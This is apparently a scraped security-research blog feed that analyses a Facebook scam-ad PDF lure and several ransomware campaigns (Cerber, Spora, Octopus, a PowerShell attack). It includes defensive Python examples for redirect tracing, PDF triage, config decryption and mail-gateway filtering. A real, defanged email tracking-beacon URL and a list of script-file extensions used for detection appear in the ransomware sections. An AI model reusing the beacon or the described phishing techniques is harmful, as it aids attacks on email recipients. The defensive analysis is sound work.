<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="328" src="https://lh4.googleusercontent.com/7irW3At0oDHgTqBRn_i60GzztQBkKiRimcQz0E98gUT6NveyCcBFltVgEthaiVRvo6WofKrFIZAv8CrQQJOjwAXSttNll6WM5UFuR3J4ZS7Zxi8iM_tJ_K9fpJp9fi4jQLC-9PMW" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">It’s a pity, but scammers have no offer for me this time.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
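<div>The chain above was recorded by clicking through in a browser. An analyst can capture the same chain without rendering any of the pages by refusing to follow redirects and reading each Location header by hand. The script below is an added example, not code from the original post: it starts a local HTTP server that plays the three hops (the paths are constructed stand-ins, only the m= parameter is taken from the chain above, and none of the real hosts is contacted) and walks them one hop at a time, stopping on a redirect loop or when a hop budget is exhausted.</div>

```python
import http.server
import threading
import urllib.error
import urllib.request
from urllib.parse import urljoin

# Constructed stand-in for the three-hop chain: each path answers with a
# 302 to the next one. A real trace would talk to the real hosts; here a
# local server plays all of them so the example runs offline.
HOPS = {
    "/ad/33dc2458": "/r/?m=0BDLADULT01",
    "/r/?m=0BDLADULT01": "/offerNotAvailable",
    "/loop/a": "/loop/b",   # a redirect loop, to exercise the loop guard
    "/loop/b": "/loop/a",
}


class _HopHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        target = HOPS.get(self.path)
        if target is not None:
            self.send_response(302)
            self.send_header("Location", target)
            self.end_headers()
        else:
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(b"<html><body>offer not available</body></html>")

    def log_message(self, *args):
        pass  # keep the example quiet


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so every hop surfaces as an HTTPError."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


REDIRECT_CODES = (301, 302, 303, 307, 308)


def trace_redirects(start_url, max_hops=10, timeout=5):
    """Walk an HTTP redirect chain one hop at a time without executing any
    page content. Returns (chain, outcome): outcome is the final HTTP status,
    "loop" if a URL repeats, or "max_hops" if the chain is longer than allowed."""
    opener = urllib.request.build_opener(_NoRedirect)
    chain = [start_url]
    url = start_url
    for _ in range(max_hops):
        req = urllib.request.Request(url, headers={"User-Agent": "redirect-tracer/1.0"})
        try:
            with opener.open(req, timeout=timeout) as resp:
                return chain, resp.status          # landed on a non-redirect page
        except urllib.error.HTTPError as err:
            location = err.headers.get("Location")
            if err.code not in REDIRECT_CODES or not location:
                return chain, err.code             # an error page, not a redirect
            url = urljoin(url, location)           # Location may be relative
            chain.append(url)
            if chain.count(url) > 1:
                return chain, "loop"
    return chain, "max_hops"


def demo(path="/ad/33dc2458"):
    """Start the local stand-in, trace from `path`, and return the chain as
    paths (host stripped) plus the outcome."""
    server = http.server.HTTPServer(("127.0.0.1", 0), _HopHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base = "http://127.0.0.1:%d" % server.server_port
    try:
        chain, outcome = trace_redirects(base + path)
    finally:
        server.shutdown()
        server.server_close()
    return [u[len(base):] for u in chain], outcome


if __name__ == "__main__":
    print(demo())
```

<div>Because nothing is rendered, JavaScript-driven redirects (meta refresh, window.location) are invisible to this tracer; a chain that ends at a 200 page which still bounces the browser is a hint to look at the page body. The hop budget and loop guard keep a malicious chain from pinning the analyst's client.</div>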
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Predictably, leadzuaf.com is registered to an advertising company called MOBUSI MOBILE ADVERTISING S.L., located in Madrid (</span><a href="https://who.is/whois/leadzuaf.com" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">WhoIs</span></a><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">).</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #f6f6f6; color: #333333; font-family: "consolas"; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="239" src="https://lh4.googleusercontent.com/EwIZwyBJFCIpO268CUgLTG3dav-92P631EXqK6oVNR4IM6XPdRAl_tqw4MsBn5GGRJzU7XQ4SXp4b7LfeQMGeYIIe8FywRj5k3eacuGHtR5SQMwSbSegt9OVXqhdJwofN1X7yK_t" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Let’s take a look at the downloaded PDF.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">First, we can scan it on VirusTotal. The result is fascinating: 0/59, ‘No engines detected this file’.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="144" src="https://lh5.googleusercontent.com/ivjm5UsFY2_f9bKIW6TJv9gZiRCeKzISF1i9iqtelZwc3Cad_O279lMb7etAPVdafPS785iZ1zcZDHaJVbcFvvnGjrdS5jWlC7Xct2uOs916YF4ffCE_I9OMJc3r2UCBGMyI5m8Y" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Inside, the PDF consists of only two parts: a stolen picture of the victim and a URI.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<ol style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Clickable JPEG image embedded into the PDF:</span></div>
</li>
</ol>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="217" src="https://lh6.googleusercontent.com/y_Vjqeypgh_BgzFKmfb7_zPDH77ihzyuTp1m-jiaIvgz5YCt7KXxYVTXas5ejdbWvN7fuRNU0Aym4CxUlSxdXQa1TqntTTEuxKTG-tBZGk-VNLtmyYBo6pUniOzGd2OoKBghKzQr" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<ol start="2" style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: decimal; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">URI</span></div>
</li>
</ol>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><img height="71" src="https://lh6.googleusercontent.com/cj6TWOX99rwzuyJbXZuK4JNon-S1GmGkhQLRetiejC3nqwL-CfA4kD7kCD2-5NCj0BfWoqP-qqGH0VypeXzftqad0Zmudj1qPQAqT-ZqFeWC4H0MT8vCXiE3o2mcFh1GrwkfzWOq" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="602" /></span></div>
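<div>A PDF that carries nothing but an image and a /URI link action is exactly the kind of lure that scores 0/59 on VirusTotal: there is no exploit to detect, only a picture and a click target. The following is an added example, not code from the original post or from the linked Yara rule: it builds a constructed one-page PDF with the same two parts (placeholder domain, not the real one) and triages it statically, listing URI actions, counting images, links and fonts, and flagging active content such as JavaScript or OpenAction. The "image-lure" verdict is the combination this post describes: a link, an image, and no text at all.</div>

```python
import re

# Constructed one-page PDF shaped like the lure described above: one image
# XObject drawn across the page and one /Link annotation with a /URI action.
# The domain and path are placeholders, not the real ones.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]
  /Resources << /XObject << /Im0 5 0 R >> >>
  /Contents 4 0 R /Annots [6 0 R] >> endobj
4 0 obj << /Length 33 >> stream
q 612 0 0 400 0 200 cm /Im0 Do Q
endstream endobj
5 0 obj << /Type /XObject /Subtype /Image /Width 1 /Height 1
  /ColorSpace /DeviceRGB /BitsPerComponent 8 /Filter /DCTDecode /Length 0 >> stream
endstream endobj
6 0 obj << /Type /Annot /Subtype /Link /Rect [0 200 612 600]
  /A << /S /URI /URI (http://lure.example/ad/PLACEHOLDER) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# /URI action with a literal string; escaped parentheses inside are allowed.
URI_ACTION = re.compile(rb"/S\s*/URI\s*/URI\s*\(((?:\\.|[^\\)])*)\)", re.S)
# Action types that run code or reach out instead of merely opening a link.
ACTIVE_ACTION = re.compile(rb"/S\s*/(JavaScript|Launch|SubmitForm|GoToR|ImportData)\b")
# Triggers that fire without a click (document open, page/annotation events).
AUTO_ACTION = re.compile(rb"/(OpenAction|AA)\b")


def _unescape(s):
    """Undo the PDF literal-string escapes for parentheses and backslash."""
    return re.sub(rb"\\(.)", rb"\1", s).decode("latin-1")


def triage_pdf(data):
    """Static triage of a PDF without rendering it.
    Caveat: a raw byte scan only sees uncompressed objects; anything packed
    into /ObjStm object streams needs a real PDF parser to inflate first."""
    uris = [_unescape(m.group(1)) for m in URI_ACTION.finditer(data)]
    images = len(re.findall(rb"/Subtype\s*/Image\b", data))
    links = len(re.findall(rb"/Subtype\s*/Link\b", data))
    fonts = len(re.findall(rb"/Type\s*/Font\b", data))
    active = sorted({m.group(1).decode() for m in ACTIVE_ACTION.finditer(data)})
    auto = bool(AUTO_ACTION.search(data))
    if active or auto:
        verdict = "active-content"
    elif uris and images and not fonts:
        verdict = "image-lure"      # picture plus clickable link, no text at all
    elif uris:
        verdict = "has-links"
    else:
        verdict = "plain"
    return {"uris": uris, "images": images, "links": links, "fonts": fonts,
            "active": active, "auto_action": auto, "verdict": verdict}


if __name__ == "__main__":
    print(triage_pdf(SAMPLE_PDF))
```

<div>The URIs this pulls out are the indicator worth keeping: the PDF itself is disposable, but the link is what feeds the redirect chain, so it belongs on the proxy blocklist and in the hunt query.</div>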
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Conclusion</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Two things amazed me in this attack. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">First, that the Facebook and Google security teams haven’t yet stopped scams of this kind. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Second, how aggressively an advertising company can attack the target audience. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Yara rule</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #1155cc; font-family: "arial"; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><a href="https://github.com/AlexanderAda/NioGuardSecurityLab/blob/master/rulesets/Yara/facebook_scam.yara" style="text-decoration: none;">https://github.com/AlexanderAda/NioGuardSecurityLab/blob/master/rulesets/Yara/facebook_scam.yara</a></span></div>
<div>
<br /></div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-20421005312350270612017-08-10T00:26:00.000-07:002017-10-18T06:15:58.294-07:00Serpent Ransomware Analysis<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSbVL3ZXtQ8gL2MAwfu_nGtMbQ1RBcRkca07BP3YA9nyc8r7t0dqzpAkRXynEtlqxNat0C7EGFG0xCeutQ_yUrtSjvD5TGb5U1V-dbYgMiUrPHpkpPLyD6m3CIqgGZNNYwrSFwZ0Sz2jqR/s1600/serpent-ui.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="725" data-original-width="926" height="500" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhSbVL3ZXtQ8gL2MAwfu_nGtMbQ1RBcRkca07BP3YA9nyc8r7t0dqzpAkRXynEtlqxNat0C7EGFG0xCeutQ_yUrtSjvD5TGb5U1V-dbYgMiUrPHpkpPLyD6m3CIqgGZNNYwrSFwZ0Sz2jqR/s640/serpent-ui.png" width="640" /></a></div>
<div>
The new Octopus cryptolocker, an offspring of the Serpent/Zyklon/WildFire/HadesLocker families, shows that .NET ransomware is not necessarily easy meat for a reverse engineer. It leverages several types of obfuscation, code encryption, and anti-debugging to protect its C# code from decompilation and analysis.</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-59219808311925851512017-08-07T01:13:00.001-07:002017-10-18T06:16:13.372-07:00Spora Ransomware Analysis<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuYcyNI75FyACnKrGPtIe_50UuzeW2xtVNxElpa_ih8m8BVAjMsWZuD9rRz_vAOyMDNjS3PiRRYVCucAcSpgKGO3HOsSF5f5FjlVH3GWWUfKti6Rn8XyoDscaKetmMHnNUyVA1peqpttbf/s1600/Spora_webUI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="698" data-original-width="1123" height="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuYcyNI75FyACnKrGPtIe_50UuzeW2xtVNxElpa_ih8m8BVAjMsWZuD9rRz_vAOyMDNjS3PiRRYVCucAcSpgKGO3HOsSF5f5FjlVH3GWWUfKti6Rn8XyoDscaKetmMHnNUyVA1peqpttbf/s640/Spora_webUI.png" width="640" /></a></div>
<br />
<br />
Similar to <a href="https://nioguard.blogspot.com/2017/07/new-variant-of-cerber-ransomware-ferber.html">Cerber (Ferber) ransomware</a>, Spora has its own intricate encryption file format and does not encrypt the whole file. The encryption block size varies depending on the file size.Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-5615954917432015902017-07-28T12:27:00.002-07:002017-10-18T06:16:26.501-07:00New variant of Cerber ransomware (Ferber) analyzed<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPUfJvrEFkMygcWAg45bmc_Z37np4pxoPaQtF4I4EliHFMw2UU9oQ0utr1syL5UWUNTW43l-pOWe655y-MKAqcOs_WQxnmCR4KezsIs_r0hewr6G3tCZOirMQGnSXtTwsIfYcworVXzy15/s1600/wallpaper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="528" data-original-width="796" height="424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPUfJvrEFkMygcWAg45bmc_Z37np4pxoPaQtF4I4EliHFMw2UU9oQ0utr1syL5UWUNTW43l-pOWe655y-MKAqcOs_WQxnmCR4KezsIs_r0hewr6G3tCZOirMQGnSXtTwsIfYcworVXzy15/s640/wallpaper.png" width="640" /></a></div>
<br />
This summer Cerber is on duty. It arrives via spear-phishing emails and bypasses antiviruses by leveraging <span style="background-color: white; color: #333333; font-family: "open sans"; font-size: 16px;">polymorphic encryption and API call obfuscation. The cryptolocker can be easily customized for every target by embedding JSON-formatted configuration data encrypted with RC4-128 (the decrypted config is on <a href="https://github.com/AlexanderAda/NioGuardSecurityLab/blob/master/RansomwareAnalysis/Cerber/cerber_config_cfd2d6f189b04d42618007fc9c540352.json">Github</a> for </span><a href="https://www.virustotal.com/en/file/408fd7edadfbdaab161e04afcfc115c464916e99aaba8b036f52c57c3ade49c5/analysis/" style="font-family: "Open Sans"; font-size: 16px;">cfd2d6f189b04d42618007fc9c540352</a>)<span style="background-color: white; color: #333333; font-family: "open sans"; font-size: 16px;">. The file encryption scheme 'master RSA-2048 key' -> 'session RSA-880' -> 'file's RC4-128' used by Cerber is not breakable. Cerber scans the IP ranges specified by CIDRs in the config for the C&C server. </span><br />
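<div>Two of the points above, the RC4-128-encrypted JSON config and the CIDR ranges scanned for the C&C server, are what an analyst reproduces first when writing a config extractor for a sample. The code below is an added example and not Cerber's code, its real config layout, or its key: it implements RC4 from scratch, encrypts a constructed stand-in config under a constructed 16-byte key so that the decryption side has something to work on, and then expands the CIDRs from the decrypted config into the host addresses the sample would probe, which is the list a defender feeds to firewall and IDS blocklists.</div>

```python
import ipaddress
import json


def rc4_keystream(key):
    """RC4: key scheduling (KSA) followed by the byte generator (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key, data):
    """Encrypt or decrypt; for a stream cipher both are the same XOR."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


# Constructed stand-in config and key. Neither is Cerber's real layout,
# real values or real key; they only give decrypt_config() something to parse.
SAMPLE_CONFIG = {
    "note_name": "README.txt",
    "servers": {"cidr": ["10.10.0.0/24", "192.0.2.0/29"]},
    "extensions": [".doc", ".xls", ".jpg"],
}
SAMPLE_KEY = b"0123456789abcdef"          # 16 bytes, i.e. a 128-bit RC4 key
SAMPLE_BLOB = rc4(SAMPLE_KEY, json.dumps(SAMPLE_CONFIG).encode("utf-8"))


def decrypt_config(blob, key):
    """Decrypt the blob and parse it as JSON. A stream cipher gives no padding
    error on a wrong key, so 'the output is not JSON' is the only signal;
    that case returns None."""
    plain = rc4(key, blob)
    try:
        return json.loads(plain.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return None


def cnc_scan_targets(config):
    """Expand the CIDRs listed in the config into the host addresses the
    sample would probe for its C&C server."""
    hosts = []
    for cidr in config.get("servers", {}).get("cidr", []):
        net = ipaddress.ip_network(cidr, strict=False)
        hosts.extend(str(h) for h in net.hosts())
    return hosts


if __name__ == "__main__":
    cfg = decrypt_config(SAMPLE_BLOB, SAMPLE_KEY)
    print(cfg)
    print(len(cnc_scan_targets(cfg)), "addresses to watch for")
```

<div>The wrong-key path matters in practice: a candidate key pulled from the binary either yields a parsable JSON document or garbage, so "does the output start with a JSON object" is a cheap check to run over every key-sized constant in the sample.</div>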
<span id="goog_13839579"></span>Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-29288398314363863352017-07-12T00:21:00.000-07:002017-10-18T06:17:46.705-07:00Targeted attack with PowerShell ransomware comes undetected<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSVDwZ9j_YU3qNEmN9aZie5p6PqbZyjQGFkVR6LoKO2L8L8IlcesRvnDr4lGV8J4xoMh_EmktHoj85v_AHHitYnlQHkTv-j_f_rm0v62Kk2OcNKXWyRmnQrzMNYRuw_dfUqlGp-Do2OsKp/s1600/email.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="613" data-original-width="1062" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSVDwZ9j_YU3qNEmN9aZie5p6PqbZyjQGFkVR6LoKO2L8L8IlcesRvnDr4lGV8J4xoMh_EmktHoj85v_AHHitYnlQHkTv-j_f_rm0v62Kk2OcNKXWyRmnQrzMNYRuw_dfUqlGp-Do2OsKp/s640/email.png" width="640" /></a></div>
<br />
An undetected PowerShell ransomware was used to attack a popular German car dealer. The attack was launched through a spear phishing email that looked like a mail delivery notification.<br />
<br />
The HTML message contains the image tag with the link used to notify the attacker about opening the email:<br />
<br />
<img src="hxxp://joelosteel.gdn/wp-admin/open.php?M=824054&N=11&L=8"><br />
<br />
The zip attachment contains JavaScript that starts PowerShell and executes the ransomware script.<br />
The JS was not detected by any of the antiviruses when first uploaded.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjqMxszRufjC9bQXjIBNsB6S3z4WkCA7-WMm3WdhE1UMBaqoI2vDVmd0DnIdNEbxQdDTjA0exc3Rk5kJliEfHqCQi3tsB4ulUwkYi2mLC38SU3iQeShpT8gdxd3VqcWyhQWKYrj0mHdkB3/s1600/vt0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="341" data-original-width="1213" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjqMxszRufjC9bQXjIBNsB6S3z4WkCA7-WMm3WdhE1UMBaqoI2vDVmd0DnIdNEbxQdDTjA0exc3Rk5kJliEfHqCQi3tsB4ulUwkYi2mLC38SU3iQeShpT8gdxd3VqcWyhQWKYrj0mHdkB3/s640/vt0.png" width="640" /></a></div>
<br />
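<div>Both indicators described above, the remote image whose query string reports that the message was opened and the zip attachment carrying a JavaScript launcher, can be caught at the mail gateway before anyone clicks. The code below is an added example and not part of the original post: it parses a constructed HTML message modelled on the one above (placeholder domain and parameter values), flags remote images that carry a tracking query string or are 1x1 pixels, and lists script-type files inside a constructed zip attachment, returning a quarantine verdict when a script is present.</div>

```python
import io
import os
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Extensions Windows will hand straight to a script host when double-clicked.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh",
                     ".hta", ".ps1", ".cmd", ".bat"}


class _ImgCollector(HTMLParser):
    """Collect the attributes of every <img> tag in an HTML body."""
    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.images.append(dict(attrs))


def _tiny(value):
    try:
        return int(value) <= 1
    except (TypeError, ValueError):
        return False


def find_beacons(html):
    """Remote images that look like read-receipt beacons: a URL with a
    query string (recipient id, campaign id) or a 1x1-or-smaller pixel."""
    parser = _ImgCollector()
    parser.feed(html)
    beacons = []
    for img in parser.images:
        src = img.get("src") or ""
        url = urlparse(src)
        if url.scheme not in ("http", "https"):
            continue                       # inline/cid images do not phone home
        if url.query or (_tiny(img.get("width")) and _tiny(img.get("height"))):
            beacons.append(src)
    return beacons


def script_attachments(zip_bytes):
    """Names inside a zip attachment whose extension is a script type."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [name for name in zf.namelist()
                if os.path.splitext(name)[1].lower() in SCRIPT_EXTENSIONS]


def triage_message(html, zip_bytes):
    beacons = find_beacons(html)
    scripts = script_attachments(zip_bytes)
    if scripts:
        verdict = "quarantine"             # script in an archive: a launcher, not a document
    elif beacons:
        verdict = "strip-remote-images"    # deliver, but do not let the beacon fire
    else:
        verdict = "deliver"
    return {"beacons": beacons, "scripts": scripts, "verdict": verdict}


# Constructed sample message modelled on the one described above.
SAMPLE_HTML = """<html><body>
<p>Your parcel could not be delivered. Details are in the attached notice.</p>
<img src="http://tracker.example/wp-admin/open.php?M=PLACEHOLDER&amp;N=11&amp;L=8" width="1" height="1">
<img src="http://tracker.example/static/logo.png" width="200" height="60">
</body></html>"""


def _build_sample_zip():
    """Constructed attachment: a script-named file with no payload plus a text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Delivery_Notice.JS", "// constructed stand-in, no payload\n")
        zf.writestr("readme.txt", "constructed benign file\n")
    return buf.getvalue()


SAMPLE_ZIP = _build_sample_zip()

if __name__ == "__main__":
    print(triage_message(SAMPLE_HTML, SAMPLE_ZIP))
```

<div>The logo image is deliberately not flagged: it has no tracking parameter and a normal size, yet fetching it still reveals the reader's IP address and client, which is why mail clients that block all remote content by default make the beacon question moot.</div>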
<br />Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-30555395327441514402017-07-08T14:56:00.000-07:002017-11-21T02:57:18.601-08:00New Cyber Security Course for Master Students<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifVp7ZKAC2SMGBp91zjh6Ns1Twa0tTom6KtDoeRKGHK7m8iehLZR_md8gcZFqHBBmq6l3HHwkNnAHRr-IYPATKMDPgt7jym4rpezVAruv23UeT-G4Yzihdlv8i2xzZ7zGl0w7raHi28ou5/s1600/engensec6.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEifVp7ZKAC2SMGBp91zjh6Ns1Twa0tTom6KtDoeRKGHK7m8iehLZR_md8gcZFqHBBmq6l3HHwkNnAHRr-IYPATKMDPgt7jym4rpezVAruv23UeT-G4Yzihdlv8i2xzZ7zGl0w7raHi28ou5/s1600/engensec6.png" /></a><br />
<br />
